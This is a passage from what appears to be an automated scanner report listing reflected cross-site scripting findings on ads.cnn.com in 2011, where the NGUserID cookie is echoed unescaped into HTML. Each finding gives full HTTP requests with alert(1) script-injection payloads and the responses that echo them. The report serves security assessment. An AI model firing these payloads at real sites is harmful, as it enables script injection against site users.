Cookie: AICookieTest=774; WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-1%0031326'-alert(1)-'be4c75d55f6; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; __qseg=Q_D|Q_T|Q_291|Q_446|Q_232|Q_239|Q_249|Q_2900|Q_1758|Q_756|Q_755|Q_578|Q_577|Q_539|Q_242|Q_240|Q_236; __qca=P0-55912109-1300909183336; s_vi=[CS]v1|26C52637051D2558-4000010200004306[CE]; rsi_segs=D08734_70117|D08734_70098|H07710_10515|D08734_D72009|H07710_10541; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ain%25253Amoney%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmoney.cnn.com%25252F2011%25252F03%25252F23%25252Fmarkets%25252Fthebuzz%25252Findex.htm%2526ot%253DA; __unam=7549672-12ee43b1306-292991ae-1

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:43:02 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:43:02 GMT
Pragma: no-cache
Content-Length: 7732
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
263,52901,56058,56872,57005,57896,58022,58312,58702,60072,60073,60092,60443,60444,60458,60541,60542,61089,61263,61399,61421,61427,61887,61913,64144&RawValues=NGUSERID%2Caa55a24-13483-843388069-1%25250031326'-alert(1)-'be4c75d55f6%2CTIL%2C1300909197304&Redirect=http://ad.doubleclick.net/clk;237101129;60716949;h" target="_blank">
...[SNIP]...

1.264. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2649c"><script>alert(1)</script>1406a504855 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/03/23/markets/thebuzz/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AICookieTest=774; WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-12649c"><script>alert(1)</script>1406a504855; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; __qseg=Q_D|Q_T|Q_291|Q_446|Q_232|Q_239|Q_249|Q_2900|Q_1758|Q_756|Q_755|Q_578|Q_577|Q_539|Q_242|Q_240|Q_236; __qca=P0-55912109-1300909183336; s_vi=[CS]v1|26C52637051D2558-4000010200004306[CE]; rsi_segs=D08734_70117|D08734_70098|H07710_10515|D08734_D72009|H07710_10541; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ain%25253Amoney%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmoney.cnn.com%25252F2011%25252F03%25252F23%25252Fmarkets%25252Fthebuzz%25252Findex.htm%2526ot%253DA; __unam=7549672-12ee43b1306-292991ae-1

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:43:55 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:43:55 GMT
Pragma: no-cache
Content-Length: 3067
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
686,917,989,1285,1589,1609,1674,1685,1738,3450,3615,4406,4444,6350,47457,52263,52901,56058,56872,57005,57896,58022,58702,61089,61263,61887,61913,64144&amp;RawValues=NGUSERID%2Caa55a24-13483-843388069-12649c"><script>alert(1)</script>1406a504855%2CTIL%2C1300909197303&amp;random=cienvfc,bgyutlIclbKst&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.265. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=428665 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=428665

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dca9"><script>alert(1)</script>1f198144f3f was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=428665 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/03/23/markets/thebuzz/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AICookieTest=774; WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-18dca9"><script>alert(1)</script>1f198144f3f; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; __qseg=Q_D|Q_T|Q_291|Q_446|Q_232|Q_239|Q_249|Q_2900|Q_1758|Q_756|Q_755|Q_578|Q_577|Q_539|Q_242|Q_240|Q_236; __qca=P0-55912109-1300909183336; s_vi=[CS]v1|26C52637051D2558-4000010200004306[CE]; rsi_segs=D08734_70117|D08734_70098|H07710_10515|D08734_D72009|H07710_10541; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ain%25253Amoney%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmoney.cnn.com%25252F2011%25252F03%25252F23%25252Fmarkets%25252Fthebuzz%25252Findex.htm%2526ot%253DA; __unam=7549672-12ee43b1306-292991ae-1

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:43:13 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:43:13 GMT
Pragma: no-cache
Content-Length: 3452
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
685,686,917,989,1285,1589,1609,1674,1685,1738,3450,3615,4407,4444,6350,47457,52263,52901,56058,56872,57005,57896,58022,58702,61089,61263,61887,61913,64144&RawValues=NGUSERID%2Caa55a24-13483-843388069-18dca9"><script>alert(1)</script>1f198144f3f%2CTIL%2C1300909197303&Redirect=http://ad.doubleclick.net/clk;230289416;53230913;a">
...[SNIP]...

1.266. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=22098 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=22098

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd3b"><script>alert(1)</script>dfb09279c29 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=22098 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/03/23/markets/thebuzz/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AICookieTest=774; WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-14fd3b"><script>alert(1)</script>dfb09279c29; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; __qseg=Q_D|Q_T|Q_291|Q_446|Q_232|Q_239|Q_249|Q_2900|Q_1758|Q_756|Q_755|Q_578|Q_577|Q_539|Q_242|Q_240|Q_236; __qca=P0-55912109-1300909183336; s_vi=[CS]v1|26C52637051D2558-4000010200004306[CE]; rsi_segs=D08734_70117|D08734_70098|H07710_10515|D08734_D72009|H07710_10541; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ain%25253Amoney%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmoney.cnn.com%25252F2011%25252F03%25252F23%25252Fmarkets%25252Fthebuzz%25252Findex.htm%2526ot%253DA; __unam=7549672-12ee43b1306-292991ae-1

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:43:05 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:43:05 GMT
Pragma: no-cache
Content-Length: 3034
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
686,917,989,1285,1589,1609,1674,1685,1738,3450,3615,4408,4444,6350,47457,52263,52901,56058,56872,57005,57896,58022,58702,61089,61263,61887,61913,64144&amp;RawValues=NGUSERID%2Caa55a24-13483-843388069-14fd3b"><script>alert(1)</script>dfb09279c29%2CTIL%2C1300909197303&amp;random=xgocer,bgyutkjclbxdW&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.267. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=187198 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=187198

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff2ac"><script>alert(1)</script>ebaa7f2eb2b was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=187198 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/03/23/markets/thebuzz/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AICookieTest=774; WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-1ff2ac"><script>alert(1)</script>ebaa7f2eb2b; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; __qseg=Q_D|Q_T|Q_291|Q_446|Q_232|Q_239|Q_249|Q_2900|Q_1758|Q_756|Q_755|Q_578|Q_577|Q_539|Q_242|Q_240|Q_236; __qca=P0-55912109-1300909183336; s_vi=[CS]v1|26C52637051D2558-4000010200004306[CE]; rsi_segs=D08734_70117|D08734_70098|H07710_10515|D08734_D72009|H07710_10541; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ain%25253Amoney%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmoney.cnn.com%25252F2011%25252F03%25252F23%25252Fmarkets%25252Fthebuzz%25252Findex.htm%2526ot%253DA; __unam=7549672-12ee43b1306-292991ae-1

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:43:15 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:43:15 GMT
Pragma: no-cache
Content-Length: 3450
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
685,686,917,989,1285,1589,1609,1674,1685,1738,3450,3615,4409,4444,6350,47457,52263,52901,56058,56872,57005,57896,58022,58702,61089,61263,61887,61913,64144&RawValues=NGUSERID%2Caa55a24-13483-843388069-1ff2ac"><script>alert(1)</script>ebaa7f2eb2b%2CTIL%2C1300909197303&Redirect=http://ad.doubleclick.net/clk;234374219;58071668;p">
...[SNIP]...

1.268. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_interstitial&cnn_money_rollup=markets_and_stocks¶ms.styles=fs_interstitial&tile=1300909197303&page.allowcompete=yes&domId=289154 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_interstitial&cnn_money_rollup=markets_and_stocks&params.styles=fs_interstitial&tile=1300909197303&page.allowcompete=yes&domId=289154

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d776"><script>alert(1)</script>e1be37af1d6 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_interstitial&cnn_money_rollup=markets_and_stocks&params.styles=fs_interstitial&tile=1300909197303&page.allowcompete=yes&domId=289154 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/03/23/markets/thebuzz/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AICookieTest=774; WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-17d776"><script>alert(1)</script>e1be37af1d6; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; __qseg=Q_D|Q_T|Q_291|Q_446|Q_232|Q_239|Q_249|Q_2900|Q_1758|Q_756|Q_755|Q_578|Q_577|Q_539|Q_242|Q_240|Q_236; __qca=P0-55912109-1300909183336; s_vi=[CS]v1|26C52637051D2558-4000010200004306[CE]; rsi_segs=D08734_70117|D08734_70098|H07710_10515|D08734_D72009|H07710_10541; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ain%25253Amoney%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmoney.cnn.com%25252F2011%25252F03%25252F23%25252Fmarkets%25252Fthebuzz%25252Findex.htm%2526ot%253DA; __unam=7549672-12ee43b1306-292991ae-1

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:44:19 GMT
Server: Apache
Vary: Cookie
AdServer: ads1ad14:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:44:19 GMT
Pragma: no-cache
Content-Length: 861
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=1869,2244,2743,3083,3285,6298,6520,7043,8598,12384,13948,17251,18961,19419,20918,25342,25344,25412,27581,
...[SNIP]...
682,685,686,917,989,1285,1589,1609,1674,1685,1738,3450,4444,6350,47457,52263,52901,55060,56058,56872,57005,57896,58022,58702,61089,61263,61887,61913,64144&RawValues=NGUSERID%2Caa55a24-13483-843388069-17d776"><script>alert(1)</script>e1be37af1d6%2CTIL%2C1300909197303&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.269. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&domId=686077&page.allowcompete=yes&domId=686077 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=686077&page.allowcompete=yes&domId=686077

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48609"><script>alert(1)</script>983abbbead was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=686077&page.allowcompete=yes&domId=686077 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/03/23/markets/thebuzz/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AICookieTest=774; WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-148609"><script>alert(1)</script>983abbbead; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; __qseg=Q_D|Q_T|Q_291|Q_446|Q_232|Q_239|Q_249|Q_2900|Q_1758|Q_756|Q_755|Q_578|Q_577|Q_539|Q_242|Q_240|Q_236; __qca=P0-55912109-1300909183336; s_vi=[CS]v1|26C52637051D2558-4000010200004306[CE]; rsi_segs=D08734_70117|D08734_70098|H07710_10515|D08734_D72009|H07710_10541; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ain%25253Amoney%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmoney.cnn.com%25252F2011%25252F03%25252F23%25252Fmarkets%25252Fthebuzz%25252Findex.htm%2526ot%253DA; __unam=7549672-12ee43b1306-292991ae-1

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:43:53 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:43:53 GMT
Pragma: no-cache
Content-Length: 2675
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
685,686,917,989,1285,1589,1609,1674,1685,1738,3450,4444,6350,47457,52263,52751,52753,52901,56058,56872,57005,57896,58022,61089,61263,61887,61913,64144&amp;RawValues=NGUSERID%2Caa55a24-13483-843388069-148609"><script>alert(1)</script>983abbbead&amp;random=chlaIpl,bgyutlzclbKmg&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.270. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fb77"><script>alert(1)</script>6b97e42d318 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aa55a27-9156-1243085206-15fb77"><script>alert(1)</script>6b97e42d318

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:39:26 GMT
Server: Apache
AdServer: ad3ad5:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:39:26 GMT
Pragma: no-cache
Content-Length: 2907
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
399,47805&amp;Targets=16169,1515&amp;Values=46,60,83,100,150,690,1589,3449,3581,4444,49637,52263,52901,56058,57005,58702,61089,61887,61913,64143,64144&amp;RawValues=NGUSERID%2Caa55a27-9156-1243085206-15fb77"><script>alert(1)</script>6b97e42d318%2CTIL%2C1300909177539&amp;random=cgzhRcm,bgyutdoigxnjy&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.271. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=homepage&cnn_money_section=sponsor_center¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=417888 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=417888

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dd5"><script>alert(1)</script>08a92e42cf7 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=417888 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-168dd5"><script>alert(1)</script>08a92e42cf7

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:39:48 GMT
Server: Apache
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:39:48 GMT
Pragma: no-cache
Content-Length: 3250
Content-Type: text/html

